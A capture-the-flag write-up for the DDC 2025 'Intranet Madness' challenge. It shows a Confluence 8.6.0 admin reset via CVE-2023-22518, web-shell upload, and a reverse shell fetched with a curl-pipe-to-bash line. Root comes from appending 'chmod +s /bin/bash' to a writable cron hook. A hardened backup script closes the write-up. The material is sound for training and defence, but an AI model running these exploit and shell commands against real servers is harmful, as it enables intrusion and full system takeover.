DDC 2025 Regionals - Intranet Madness
Challenge Description
Original (Danish), translated:
The Squid Games are underway. They have set up a communication platform for the participants, and the participants are yapping away.
Log in with user: 456 and password: password, or create your own user to participate!
intranetmadness.hkn:8090
Owning Confluence
Going to the URL we are greeted with the login page of a Confluence instance; using the provided credentials we can log in. We take note of the version displayed at the bottom: 8.6.0.
There are two spaces on the site: the meme-filled space of Blæksprutte spillerne, and DOCS. The latter is what will be useful for us.
In DOCS > Incident Response Plan > Backup Strategi we see how they run a backup script (/usr/local/bin/squidbackup.sh) every minute, and also a comment by the admin (001) about how important it is to patch the server so that backup recovery isn't needed.
Let's look at 001. Checking their calendar we see an event referring to a 'new' exploit that can reset Confluence to admin:admin credentials. Reading this I thought of a blog post written by a former colleague. So the vulnerability is probably CVE-2023-22518, to which version 8.6.0 of Confluence is vulnerable.
Searching for a PoC I found https://github.com/ForceFledgling/CVE-2023-22518, using this I reset the confluence instance:
┌──(osiriz㉿kali)-[~/CVE-2023-22518]
└─$ python exploit.py
Enter the URL: http://intranetmadness.hkn:8090/json/setup-restore.action?synchronous=True
Enter the path to the .zip file: xmlexport-20231109-060519-1.zip
Exploit Success! Login Using 'admin :: admin'
And now we can login using admin:admin.
Getting shell access
Now that we are the administrator of the Confluence server, we can leverage this to get a user shell on the server. Using the atlplug.jar file from the PoC GitHub repo, we can install a web shell in Confluence by going to General Configuration > Manage apps > Upload app and selecting the jar file. After it has finished installing, click Get started and we have a web shell:
shell>whoami
confluence
shell>pwd
/var/atlassian/application-data/confluence
I then use https://www.revshells.com to generate a bash reverse shell, save it as revshell.sh, serve it with python -m http.server, listen with nc -lvnp 9001, and then fetch and run it on the server:
shell>curl http://10.0.240.241:8000/revshell.sh|bash
We now have a more usable shell; quickly stabilise it:
confluence@remote$ python3 -c 'import pty;pty.spawn("/bin/bash")'
confluence@remote$ ^Z
zsh: suspended nc -lvnp 9001
osiriz@kali$ stty raw -echo; fg
[1] + continued nc -lvnp 9001
confluence@remote$ export TERM=xterm
Getting root
Finally we can get root by looking at the backup script (/usr/local/bin/squidbackup.sh):
confluence@remote$ ls -l /usr/local/bin/squidbackup.sh
-rwxr-xr-x 1 root root 601 Apr 4 12:52 /usr/local/bin/squidbackup.sh
confluence@remote$ cat /usr/local/bin/squidbackup.sh
#!/bin/bash
# Directory to back up
SOURCE_DIR="/var/atlassian/application-data/confluence"
# Backup destination (user-specified)
BACKUP_DIR="$1"
# Check if backup directory is provided
if [ -z "$BACKUP_DIR" ]; then
echo "Usage: $0 <backup_directory>"
exit 1
fi
echo "[*] Starting backup from '$SOURCE_DIR' to '$BACKUP_DIR'..."
# Perform the backup
cp -r "$SOURCE_DIR"/* "$BACKUP_DIR"
if [ -f "$BACKUP_DIR/post-backup.sh" ]; then
echo "[!] post-backup.sh found. Executing..."
chmod +x "$BACKUP_DIR/post-backup.sh"
"$BACKUP_DIR/post-backup.sh"
fi
echo "[*] Backup completed."
We can see that we cannot write to this script, but it runs a second script called post-backup.sh from the directory denoted by the variable $BACKUP_DIR, which is the first argument to the script. Checking the crontab we can see that this is /home/confluence/backup:
confluence@remote$ cat /etc/cron.d/confluence_backup
*/1 * * * * /usr/local/bin/squidbackup.sh /home/confluence/backup
So let's check this script out:
confluence@remote$ ls -l /home/confluence/backup/post-backup.sh
-rwxrwxrwx 1 confluence confluence 470 Apr 4 12:52 /home/confluence/backup/post-backup.sh
confluence@remote$ cat /home/confluence/backup/post-backup.sh
#!/bin/bash
LOG_FILE="backup-log.txt"
echo "[$(date '+%Y-%m-%d %H:%M:%S')] post-backup.sh: Running in directory: $PWD" >> "$LOG_FILE"
echo "[$(date '+%Y-%m-%d %H:%M:%S')] Contents of $PWD:" >> "$LOG_FILE"
ls -la >> "$LOG_FILE"
echo "" >> "$LOG_FILE"
echo "[$(date '+%Y-%m-%d %H:%M:%S')] Number of files/folders in $PWD:" >> "$LOG_FILE"
ls -la | wc -l >> "$LOG_FILE"
echo "" >> "$LOG_FILE"
echo "[$(date '+%Y-%m-%d %H:%M:%S')] post-backup.sh completed." >> "$LOG_FILE"
We can write to this file, so let's set the SUID bit on /bin/bash so we can spawn a shell with root permissions:
confluence@remote$ echo "chmod +s /bin/bash" >> /home/confluence/backup/post-backup.sh
And after about a minute we should be able to get the root shell:
confluence@remote$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1446024 Mar 31 2024 /bin/bash
confluence@remote$ /bin/bash -p
root@remote# cat /flag.txt
DDC{D0N7H4CK7H35QU1DSM4N}
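The root cause of the escalation above is a root cron job that executes a hook living in a directory the confluence user owns. As an added defensive example (not the challenge's script and not part of the original writeup), here is a hardened rewrite of squidbackup.sh that refuses to run post-backup.sh unless it is a regular file owned by the uid running the backup and not writable by group or others; it assumes GNU stat (Linux) and the hypothetical helper names hook_is_trusted and run_backup:

```shell
#!/bin/bash
# Hardened variant of squidbackup.sh (added example, not the original script).
# The original runs "$BACKUP_DIR/post-backup.sh" as root even though the
# confluence user owns that directory and file. Here the hook must be a
# regular file (not a symlink), owned by the uid running the backup, and
# not group- or world-writable. Assumes GNU stat.

# hook_is_trusted <path> [owner-uid]: return 0 only if <path> is safe to run.
# owner-uid defaults to the current uid (root when launched from cron).
hook_is_trusted() {
    local hook="$1" want_uid="${2:-$(id -u)}" owner mode
    [ -f "$hook" ] || return 1        # must exist as a regular file
    [ -L "$hook" ] && return 1        # refuse symlinks: target can be swapped
    owner=$(stat -c '%u' "$hook") || return 1
    mode=$(stat -c '%a' "$hook") || return 1
    [ "$owner" = "$want_uid" ] || return 1
    # Octal mode: last digit is "others", second-to-last is "group";
    # digits 2, 3, 6 and 7 carry the write bit.
    case "$mode" in
        *[2367])  return 1 ;;         # world-writable
        *[2367]?) return 1 ;;         # group-writable
    esac
    return 0
}

# run_backup <source> <dest>: copy the tree, then run the hook only if it
# passes hook_is_trusted. Prints one status word: hook-run, hook-refused
# or no-hook.
run_backup() {
    local src="$1" dest="$2" hook
    [ -d "$src" ] && [ -d "$dest" ] || { echo "usage: run_backup <src> <dest>" >&2; return 1; }
    cp -r "$src"/. "$dest"/           # "/." copies dotfiles and avoids a glob
    hook="$dest/post-backup.sh"
    if [ -f "$hook" ]; then
        if hook_is_trusted "$hook"; then
            "$hook"
            echo "hook-run"
        else
            echo "[!] refusing $hook: wrong owner or writable by others" >&2
            echo "hook-refused"
        fi
    else
        echo "no-hook"
    fi
}
```

With the challenge's layout (post-backup.sh mode 777, owned by confluence, run by root) the hook is refused and the backup still completes.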